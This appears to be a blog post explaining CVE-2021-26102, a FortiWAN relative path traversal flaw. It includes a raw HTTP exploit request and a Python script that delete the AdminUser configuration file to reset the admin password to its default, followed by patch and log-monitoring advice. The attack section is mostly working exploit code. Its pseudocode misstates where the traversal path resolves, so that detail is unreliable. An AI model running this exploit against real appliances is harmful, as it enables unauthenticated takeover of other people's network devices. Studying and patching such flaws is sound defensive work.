CVE-2021-26102 - Understanding FortiWAN Relative Path Traversal Bug and How Attackers Can Reset Admin Passwords

In cybersecurity, vulnerabilities come in all shapes and sizes, but some bugs are both simple and powerful. CVE-2021-26102 is one such example—a relative path traversal vulnerability in FortiWAN, a network device from Fortinet. This bug allows an attacker to delete files on the system, even resetting the admin password back to factory settings, and all of this can happen without needing to log in. Thankfully, understanding how this works can help strengthen defenses.

This post will walk you through how the bug works, show example payloads, and discuss why this issue is so critical.

FortiWAN 4.4 (all versions)

This problem exists because the system fails to properly sanitize file paths in a certain HTTP POST request, which means attackers can request file operations outside the intended directory—including deleting files elsewhere on the device.

The attacker can delete sensitive files, like configuration files, from the system.

- Deleting these files can even reset the admin password, letting hackers take full control after a few simple steps.

Root Cause

The bug is triggered by a POST request to a specific endpoint (often /cgi-bin/portal), where the filename parameter is not properly sanitized. If an attacker supplies a file path with ../ (dot-dot-slash), they can escape out of the expected directory and manipulate system files.

Here's a typical vulnerable code pattern (simplified for illustration)

# Pseudocode from backend
def delete_file(request):
    filename = request.POST['filename']
    filepath = "/home/www/data/" + filename
    os.remove(filepath)

If filename is ../../etc/password, this code will delete /home/www/etc/password—an unintended file!

Exploit Steps

What can an attacker do?
By sending a crafted HTTP POST request, they can delete crucial files. For FortiWAN, deleting certain configuration files resets the Admin password to its default.

Example Exploit Request

POST /cgi-bin/portal HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded

filename=../../etc/config/AdminUser
action=delete

- filename=../../etc/config/AdminUser leverages path traversal to target the configuration file.
- Deleting this (or related) files causes the system to revert to its default credentials after reboot or sometimes immediately.

Now, anyone can log in with the default admin/password combination.

Here’s a simple Python snippet for educational purposes

import requests

target = "http://victim-ip/cgi-bin/portal";
payload = {
    "filename": "../../etc/config/AdminUser",
    "action": "delete"
}

resp = requests.post(target, data=payload)
print(f"Status: {resp.status_code}")

> Warning: Only test your own devices or with explicit permission!

Official Reference and Patch

Fortinet Security Advisory:
- FG-IR-20-179 FortiWAN Path Traversal

Fortinet patched this bug in FortiWAN 4.5.8 and above. If you’re running an older version, update now.

Update Firmware to the latest FortiWAN version.

2. Monitor logs for suspicious POST requests targeting /cgi-bin/portal with unusual file paths.
3. Disable unnecessary HTTP/API interfaces if not needed.

Conclusion

CVE-2021-26102 is a textbook example of how simple code mistakes—like missing path validation—can have severe consequences in real-world systems. Remote attackers can exploit this flaw to reset admin passwords and take over FortiWAN appliances. If you operate such devices, check your firmware version and update as soon as possible.

For more details and official recommendations, refer to the original advisory.

Further Reading

- CWE-23: Relative Path Traversal (MITRE)
- FortiWAN Documentation & Downloads


*If you found this explanation helpful, please share it with your IT and security teams!*

Timeline

Published on: 12/19/2024 14:15:05 UTC